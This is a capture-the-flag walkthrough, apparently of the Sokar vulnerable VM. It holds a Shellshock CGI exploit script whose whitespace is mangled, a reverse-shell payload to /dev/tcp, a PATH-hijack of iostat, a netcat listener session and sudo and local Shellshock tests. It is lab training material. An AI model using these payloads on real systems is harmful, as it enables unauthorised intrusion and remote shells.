Using netdiscover as routine to detect the target’s IP address (10.10.10.145 in this case).
10.10.10.145 is our Target!
Then run NMAP scan to detect opening ports/running services on the target. From the result, found apache 2.2.15 is running on port 591 and the target OS is CentOS Linux.
nmap -sV -v -O -A -T5 -p- 10.10.10.145
Then I open iceweasel browser to have a close look at port 591.
From the content displayed, we know the server is running system command: netstat and iostat
From the source code, we found an URL: http://10.10.10.145:591/cgi-bin/cat
It’s time to try shellshock (bash bug)
After googled shellshock, I found some topics talking about how to test/exploit shellshock vulnerability in CGI. The following command is picked from one of them.
#!/usr/bin/pythonimporthttplibimporturllibimportsysstr_usage="Usage: %s <command>"%sys.argv[0]str_example="Example: %s\"/bin/cat /etc/passwd\""%sys.argv[0]ip="10.10.10.145"port=591uri="/cgi-bin/cat"if(len(sys.argv)<2):printstr_usageprintstr_exampleexit(0)exp="() { test;};echo \"Content-type: text/plain\"; echo; echo; "+sys.argv[1]# the following exp is used to write reverse shell code into the file /home/bynarr/iostat#exp = "() { test;};echo \"Content-type: text/plain\"; echo; echo; /bin/echo -e '#!/bin/bash\\n/bin/bash -i >& /dev/tcp/10.10.10.131/51242 0>&1' > /home/bynarr/iostat"printexpheaders={"test":exp}conn=httplib.HTTPConnection(ip,port)conn.request("GET",uri,headers=headers)res=conn.getresponse()printres.status,res.reasondata=res.read()printdataconn.close()
by using sokar.py script, I poked around the system and found something interesting.
Here we go, I got the password (fruity) for user bynarr and notice that we only can got out to port 51242 from the server.
Another notice, . has been set in environment variable $PATH, which means when run a program the system will check the current user path first. This leave us a chance to hijack the program and make a reverse shell back to my Kali.
Then I changed the exp payload in my python script to write a bash script into /home/bynarr/iostat (iostat is the hijack target).
Then use my script to grant the new fake iostat to executable.
Now setup NC on my Kali to listen on port 51242, after waiting for seconds, I got a shell with bynarr privilege!
12345678910111213141516171819202122232425
root@kali:~# nc -lvnp 51242
listening on [any] 51242 ...
connect to [10.10.10.131] from (UNKNOWN) [10.10.10.145] 56650
bash: no job control in this shell
[bynarr@sokar ~]$ id
id
uid=500(bynarr) gid=501(bynarr) groups=501(bynarr),500(forensic)
[bynarr@sokar ~]$ pwd
pwd
/home/bynarr
[bynarr@sokar ~]$ cat /proc/version
cat /proc/version
Linux version 2.6.32-504.1.3.el6.x86_64 (mockbuild@c6b9.bsys.dev.centos.org) (gcc version 4.4.7 20120313 (Red Hat 4.4.7-11) (GCC) ) #1 SMP Tue Nov 11 17:57:25 UTC 2014
[bynarr@sokar ~]$ ls -al
ls -al
total 48
drwxrwxrwx. 2 bynarr bynarr 4096 Jul 7 17:20 .
drwxr-xr-x. 4 root root 4096 Dec 30 2014 ..
-rw-------. 1 bynarr bynarr 4982 Jul 7 17:13 .bash_history
-rw-r--r--. 1 bynarr bynarr 18 Feb 21 2013 .bash_logout
-rw-r--r--. 1 bynarr bynarr 178 Nov 12 2014 .bash_profile
-rw-r--r--. 1 bynarr bynarr 124 Feb 21 2013 .bashrc
-rwxr-xr-x 1 apache apache 61 Jul 7 16:09 iostat
-rwxr-xr-x 1 root root 368 Jan 27 19:14 lime
-rw------- 1 root root 10728 Nov 13 2014 lime.ko
I run command sudo -l to check the allowed commands for user bynarr.
12345678910111213141516
[bynarr@sokar ~]$ sudo -l
sudo -l
Matching Defaults entries for bynarr on this host:
!requiretty, visiblepw, always_set_home, env_reset, env_keep="COLORS
DISPLAY HOSTNAME HISTSIZE INPUTRC KDEDIR LS_COLORS", env_keep+="MAIL PS1
PS2 QTDIR USERNAME LANG LC_ADDRESS LC_CTYPE", env_keep+="LC_COLLATE
LC_IDENTIFICATION LC_MEASUREMENT LC_MESSAGES", env_keep+="LC_MONETARY
LC_NAME LC_NUMERIC LC_PAPER LC_TELEPHONE", env_keep+="LC_TIME LC_ALL
LANGUAGE LINGUAS _XKB_CHARSET XAUTHORITY",
secure_path=/sbin\:/bin\:/usr/sbin\:/usr/bin
User bynarr may run the following commands on this host:
(ALL) NOPASSWD: /home/bynarr/lime
[bynarr@sokar ~]$ sudo LANG='() { :;}; /bin/bash' /home/bynarr/lime
sudo LANG='() { :;}; /bin/bash' /home/bynarr/lime
sudo: sorry, you are not allowed to set the following environment variables: LANG
From the output, I noticed that executable program lime is owned by root but bynarr can run it.
Due to the server is vulnerable to shellshock, I use the following command (found in here) to double check if it can be exploited locally.
env x='() { :;}; echo vulnerable' bash -c "echo this is a test"
1234
[bynarr@sokar ~]$ env x='() { :;}; echo vulnerable' bash -c "echo this is a test"
< { :;}; echo vulnerable' bash -c "echo this is a test"
vulnerable
this is a test
Yes it is vulnerable! From the previous sudo -l output, there are couple of environment variables can be used to exploit.